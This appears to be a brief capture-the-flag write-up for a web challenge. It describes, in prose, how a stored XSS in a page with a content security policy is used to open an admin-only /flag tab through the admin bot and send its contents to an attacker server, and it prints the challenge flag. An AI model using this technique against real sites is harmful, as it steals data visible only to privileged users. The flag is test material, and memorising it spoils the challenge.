web/California-state-police
we got an admin bot, and its cookies are ser to HttpOnly
and SameSite=Lax
so, we can't get the cookie with just document.cookies
you will get an empty string. read more about this here!
Website Overview
we have a home page with a form which is vulnerable to stored XSS.
Source code review
we can see a CSP policy is set.
we can go to csp-evaluator to check what's vulnerable.
How to Get Flag ?
we have a Flag route which only admin can access
so these were my leads during CTF I couldn't solve it so after CTF I checked a payload's first line I saw window.open
so with that clue in mind I started this challenge again.
these are the things which we can do with that CSP
we can inject script for that page.
we can't access or fetch
/flag
route. we can only executejs
in present pagewe can control whole browser with
window
with these in mind let's plan a payload
we can open another tab with
/flag
window.open()
we can execute code in that tab using it's assigned variable
so, when that
/flag
is loaded we have to inject something to make a post request to/flag
and send that data to our servers.
after making submitting the crime to admin bot we will get the flag.
lactf{m4yb3_g1v1ng_fr33_xss_1s_jus7_4_b4d_1d3a}
Homework not some homework exactly.
I want web team members to come up with other way to do this without using fetch
.
Last updated